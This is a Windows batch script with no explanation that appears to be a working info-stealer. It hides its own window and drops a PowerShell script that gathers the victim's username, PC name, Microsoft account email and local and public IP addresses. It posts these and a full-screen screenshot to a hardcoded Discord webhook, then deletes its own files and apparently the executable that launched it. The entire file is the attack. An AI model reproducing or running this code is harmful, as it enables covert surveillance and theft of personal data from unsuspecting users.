@echo off
if "%1"=="hide" goto run
set "vbs_hide=%temp%\hide_run.vbs"
echo CreateObject("Wscript.Shell").Run Chr(34) ^& "%~f0" ^& Chr(34) ^& " hide", 0, False > "%vbs_hide%"
wscript "%vbs_hide%"	
del "%vbs_hide%"
exit
:run
set "webhook=https://discord.com/api/webhooks/1545786149182640148/jDHCde9SpmW9Ezp6Rsi4cc1l4JdzWOxE5j3gGtli_eVJsJ5PuMDk__pH-4MhUAgqcgWI"
if not exist "%webhook%" mkdir "%webhook%"
set "ps=%temp%\gato.ps1"

echo Add-Type -AssemblyName System.Windows.Forms > "%ps%"
echo Add-Type -AssemblyName System.Drawing >> "%ps%"
echo $w = '%webhook%' >> "%ps%"
echo $ip = try { ^(Get-NetIPAddress -AddressFamily IPv4 ^| Where-Object { $_.InterfaceAlias -notlike '*Loopback*' }^).IPAddress ^| Select-Object -First 1 } catch { 'N/A' } >> "%ps%"
echo $pub = try { ^(Invoke-WebRequest -uri 'http://ifconfig.me/ip' -TimeoutSec 5^).Content.Trim^(^) } catch { 'No_Internet' } >> "%ps%"
echo $email = try { ^(Get-ItemProperty 'HKCU:\Software\Microsoft\IdentityCRL\UserExtendedProperties\*' -ErrorAction Stop^).PSChildName -join ', ' } catch { 'No encontrado' } >> "%ps%"
echo $fecha = Get-Date -Format "yyyy-MM-dd HH:mm:ss" >> "%ps%"
echo $body = @{ content = "``````Usuario: $env:USERNAME`nPC: $env:COMPUTERNAME`nEmail: $email`nFecha: $fecha`nIP Local: $ip`nIP Publica: $pub``````" } ^| ConvertTo-Json >> "%ps%"
echo Invoke-RestMethod -Uri $w -Method Post -Body $body -ContentType "application/json" >> "%ps%"
echo $b = [System.Windows.Forms.Screen]::PrimaryScreen.Bounds >> "%ps%"
echo $bmp = New-Object System.Drawing.Bitmap($b.Width, $b.Height) >> "%ps%"
echo $g = [System.Drawing.Graphics]::FromImage($bmp) >> "%ps%"
echo $g.CopyFromScreen($b.Location, [System.Drawing.Point]::Empty, $b.Size) >> "%ps%"
echo $ss = "$env:TEMP\gato_ss.png" >> "%ps%"
echo $bmp.Save($ss, [System.Drawing.Imaging.ImageFormat]::Png) >> "%ps%"
echo $g.Dispose(); $bmp.Dispose() >> "%ps%"
echo Invoke-RestMethod -Uri $w -Method Post -Form @{ file1 = Get-Item $ss; payload_json = '{"content":"SS: '+$env:USERNAME+' - '+$env:COMPUTERNAME+'"}' } >> "%ps%"
echo Remove-Item $ss -Force >> "%ps%"
echo Remove-Item $MyInvocation.MyCommand.Source -Force >> "%ps%"
echo try { >> "%ps%"
echo   $p = Get-CimInstance Win32_Process -Filter "ProcessId=$PID" >> "%ps%"
echo   $parent = Get-CimInstance Win32_Process -Filter "ProcessId=$($p.ParentProcessId)" >> "%ps%"
echo   $gp = Get-CimInstance Win32_Process -Filter "ProcessId=$($parent.ParentProcessId)" >> "%ps%"
echo   if ($gp.ExecutablePath -like '*.exe' -and $gp.Name -ne 'explorer.exe') { >> "%ps%"
echo     $target = $gp.ExecutablePath >> "%ps%"
echo     Start-Sleep -Seconds 3 >> "%ps%"
echo     Remove-Item $target -Force -ErrorAction SilentlyContinue >> "%ps%"
echo   } >> "%ps%"
echo } catch {} >> "%ps%"

start /b "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File "%ps%"
